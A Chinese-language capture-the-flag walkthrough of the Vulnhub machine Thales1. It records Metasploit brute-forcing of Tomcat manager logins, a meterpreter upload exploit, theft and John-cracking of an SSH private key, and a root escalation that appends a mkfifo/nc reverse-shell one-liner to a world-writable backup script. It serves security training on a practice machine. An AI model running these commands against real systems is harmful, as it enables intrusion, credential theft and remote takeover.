第303个Vulnhub靶场演练攻略:Thales1
Thales1 Vulnhub 演练
“Thales”是 Vulnhub 上的夺旗挑战赛。MachineBoy 开发了这款机器,功不可没。https://www.vulnhub.com/entry/thales-1,749/在本教程中,我们将学习如何利用 Tomcat 应用程序管理器实例中的漏洞获取系统访问权限,以及如何利用以 root 权限运行的脚本获取 root 访问权限。接下来,让我们看看如何按照正确的步骤攻克这台机器。
1.网络扫描
1.1 首先,我们将使用 netdiscover 命令扫描网络以查找受害者机器的 IP。
网络发现
我们发现受害者机器的 IP 地址为192.168.2.117
Currently scanning: Finished! | Screen View: Unique Hosts 61 Captured ARP Req/Rep packets, from 5 hosts. Total size: 3660 _____________________________________________________________________________IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.2.1 5e:ec:47:29:ea:18 10 600 Unknown vendor 192.168.2.117 08:00:27:e5:33:20 8 480 PCS Systemtechnik GmbH 192.168.2.127 f0:2f:74:1a:39:e7 22 1320 ASUSTek COMPUTER INC. 192.168.2.129 54:05:db:05:79:fd 15 900 LCFC(Hefei) Electronics T192.168.2.243 d0:11:e5:77:95:09 6 360 Apple, Inc. ┌──(root㉿kali)-[~]
└─# netdiscover -r 192.168.2.0/24
1.2 此外,我们对开放端口枚举进行了积极扫描(-A),发现了以下端口详细信息:
nmap -A 192.168.1.175
根据 Nmap 输出,我们得到
在端口 22 上运行 SSH 服务器(OpenSSH)
在端口 8080 上运行 HTTP 服务(Apache tomcat)
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.2.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 08:06 EDT
Nmap scan report for miletus.lan (192.168.2.117)
Host is up (0.00052s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
| 256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_ 256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open http Apache Tomcat 9.0.52
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.52
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:E5:33:20 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 0.52 ms miletus.lan (192.168.2.117)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.52 seconds┌──(root㉿kali)-[~]
└─#
2.枚举
2.1 滥用HTTP
现在让我们看看是否可以从端口 8080 获取任何有趣的信息。由于 Apache Tomcat 服务器在端口 8080 上运行,我们可以立即在浏览器中看到结果。
我们注意到 Tomcat 版本号:9.0.52
网址:http://192.168.2.117: 8080
3.渗透
3.1 Metasploit
现在,让我们启动 msfconsole。我们将使用辅助扫描程序来暴力破解 Tomcat 管理器的登录信息。这里我们使用 Metasploit 的默认字典进行密码暴力破解。
结果我们得到的tomcat的密码是tomcat:role1
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.2.117
rhosts => 192.168.2.117
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set username tomcat
username => tomcat
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
[+] 192.168.2.117:8080 - Login Successful: tomcat:role1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/tomcat_mgr_login) > 3.2 由于我们枚举了 Tomcat Manager 登录凭据,因此我们可以通过注入恶意 Java Payload 来尝试反向连接。我们将利用此漏洞获取 meterpreter shell。
msf6 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.2.117
rhosts => 192.168.2.117
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword role1
httppassword => role1
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 192.168.2.185:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying XBTLaZYyu...
[*] Executing XBTLaZYyu...
[*] Undeploying XBTLaZYyu ...
[*] Sending stage (58073 bytes) to 192.168.2.117
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (192.168.2.185:4444 -> 192.168.2.117:42922) at 2025-05-31 09:35:29 -0400meterpreter > cd /home
meterpreter > ls
Listing: /home
==============Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040554/r-xr-xr-- 4096 dir 2021-10-14 07:28:04 -0400 thalesmeterpreter > cd thales/
meterpreter > ls
Listing: /home/thales
=====================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100001/------ 457 fil 2021-10-14 07:30:45 -04 .bash_history
--x 00
100445/r--r-- 220 fil 2018-04-04 14:30:26 -04 .bash_logout
r-x 00
100445/r--r-- 3771 fil 2018-04-04 14:30:26 -04 .bashrc
r-x 00
040001/------ 4096 dir 2021-08-15 12:58:00 -04 .cache
--x 00
040001/------ 4096 dir 2021-08-15 12:58:00 -04 .gnupg
--x 00
040555/r-xr-x 4096 dir 2021-08-15 13:50:29 -04 .local
r-x 00
100445/r--r-- 807 fil 2018-04-04 14:30:26 -04 .profile
r-x 00
100445/r--r-- 66 fil 2021-08-15 13:50:18 -04 .selected_editor
r-x 00
040777/rwxrwx 4096 dir 2021-08-16 16:34:04 -04 .ssh
rwx 00
100445/r--r-- 0 fil 2021-10-14 06:45:25 -04 .sudo_as_admin_successf
r-x 00 ul
100444/r--r-- 107 fil 2021-10-14 05:36:43 -04 notes.txt
r-- 00
100000/------ 33 fil 2021-08-15 14:18:54 -04 user.txt
--- 00meterpreter >
3.3 获取 meterpreter shell 后,我们导航到“home”目录,在那里我们可以找到一个名为“thales”的子目录。进入“thales”目录,我们得到两个文件:user.txt和notes.txt。我们还找到了一个.ssh目录。
3.4 我们观察到受害者机器上存在公钥(id_rsa.pub)和私钥(id_rsa)。私钥用于登录。现在,我们将私钥下载到我们的kali机器上。
meterpreter > cd .ssh
meterpreter > ls
Listing: /home/thales/.ssh
==========================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 1766 fil 2021-08-16 16:34:04 -0400 id_rsa
100444/r--r--r-- 396 fil 2021-08-16 16:34:04 -0400 id_rsa.pubmeterpreter > download id_rsa /root/Desktop/
[*] Downloading: id_rsa -> /root/Desktop/id_rsa
[*] Downloaded 1.72 KiB of 1.72 KiB (100.0%): id_rsa -> /root/Desktop/id_rsa
[*] Completed : id_rsa -> /root/Desktop/id_rsa
meterpreter >
3.5 这里我们下载了受密码保护的id_rsa文件,现在我们需要将 id_rsa 密钥转换为可以使用’john ’ 破解的哈希值。首先,我们使用命令 ‘ssh2john’ 将密钥转换为哈希值。
3.6 现在我们可以尝试用 John the Ripper 破解哈希值了。我们将使用单词列表“rockyou.txt”。
┌──(root㉿kali)-[~/Desktop]
└─# locate ssh2john
/usr/bin/ssh2john
/usr/share/john/ssh2john.py
/usr/share/john/__pycache__/ssh2john.cpython-313.pyc┌──(root㉿kali)-[~/Desktop]
└─# /usr/share/john/ssh2john.py id_rsa > sshhash┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt sshhash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
fopen: /usr/share/wordlists/rockyou.txt: No such file or directory┌──(root㉿kali)-[~/Desktop]
└─# wordlists -h> wordlists ~ Contains the rockyou wordlist/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt.gz
├── seclists -> /usr/share/seclists
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txtDo you want to extract the wordlist rockyou.txt? [Y/n] y
Extracting rockyou.txt.gz...> wordlists ~ Contains the rockyou wordlist/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt
├── rockyou.txt.gz
├── seclists -> /usr/share/seclists
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txt┌──(root㉿kali)-[~]
└─# cd Desktop ┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt sshhash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
vodka06 (id_rsa)
1g 0:00:00:00 DONE (2025-05-31 09:45) 1.162g/s 3325Kp/s 3325Kc/s 3325KC/s vodka1420..vodka0260
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 3.7 获得 shell 后,我们将使用以下命令将非交互式 shell 升级为部分交互式 shell:
python -c ‘导入pty;pty.spawn(“/bin/bash”)’
由于我们已经破解了用户“thales”的密码,让我们切换到thales用户。
3.8 切换到 thales 用户后,我们使用“ id ”命令查看真实有效的“用户和组”ID。我们发现 thales 是非 root 用户。
3.9 我们现在使用“ sudo -l ”来检查哪些命令可以由用户 thales 以 root 身份运行。
我们发现用户 thales 没有权限以 root 身份运行任何命令。因此,现在我们来搜索一些有趣的文件。
3.10 我们在 note.txt 上得到提示,在目录/usr/local/bin/backup.sh中为我们准备了一个备份脚本
meterpreter > shell
Process 1 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
python -c 'import pty; pty.spawn("/bin/bash")'^[[D^[[D^[[D^[[D^[[D^[[1;5D^?
/bin/sh: 2: python: not found
/bin/sh: 2: 5D: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@miletus:/home/thales$ su thales
su thales
Password: vodka06thales@miletus:~$ id
id
uid=1000(thales) gid=1000(thales) groups=1000(thales),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
thales@miletus:~$ sudo -l
sudo -l
[sudo] password for thales: vodka06Sorry, user thales may not run sudo on miletus.
thales@miletus:~$ cd /home
cd /home
thales@miletus:/home$ ls
ls
thales
thales@miletus:/home$ cd thales
cd thales
thales@miletus:~$ ls
ls
notes.txt user.txt
thales@miletus:~$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
thales@miletus:~$
3.11 现在,我们来检查一下backup.sh文件。我们检查发现,该文件具有读、写、执行权限,并且文件所有者是root。
hales@miletus:~$ cat /usr/local/bin/backup.sh
ls -la /usr/local/bin/backup.shcat /usr/local/bin/backup.sh
#!/bin/bash
####################################
#
# Backup to NFS mount script.
#
##################################### What to backup.
backup_files="/opt/tomcat/"# Where to backup to.
dest="/var/backups"# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo# Backup the files using tar.
tar czf $dest/$archive_file $backup_files# Print end status message.
echo
echo "Backup finished"
date# Long listing of files in $dest to check file sizes.
ls -lh $dest
thales@miletus:~$ ls -la /usr/local/bin/backup.sh-rwxrwxrwx 1 root root 612 Oct 14 2021 /usr/local/bin/backup.sh
thales@miletus:~$
4.权限提升
由于backup.sh是可写的,因此我们可以通过注入反向shell负载来编辑该脚本,并期望获得root shell访问权限。
4.1 在我们的攻击机(kali)上,我们将启动一个 Netcat 监听器来接收 shell,端口为 8888
4.2 在终端中执行以下命令,附加用于注入恶意负载的backup.sh脚本。
thales@miletus:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.185 8888 >/tmp/f" >>backup.sh
< -i 2>&1|nc 192.168.2.185 8888 >/tmp/f" >>backup.sh
thales@miletus:~$ 4.3 因为它是一个自动运行的备份脚本,因此它将通过端口 8888 授予 root 权限的反向 shell。
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvp 8888
listening on [any] 8888 ...
connect to [192.168.2.185] from miletus.lan [192.168.2.117] 43530
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt# cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
#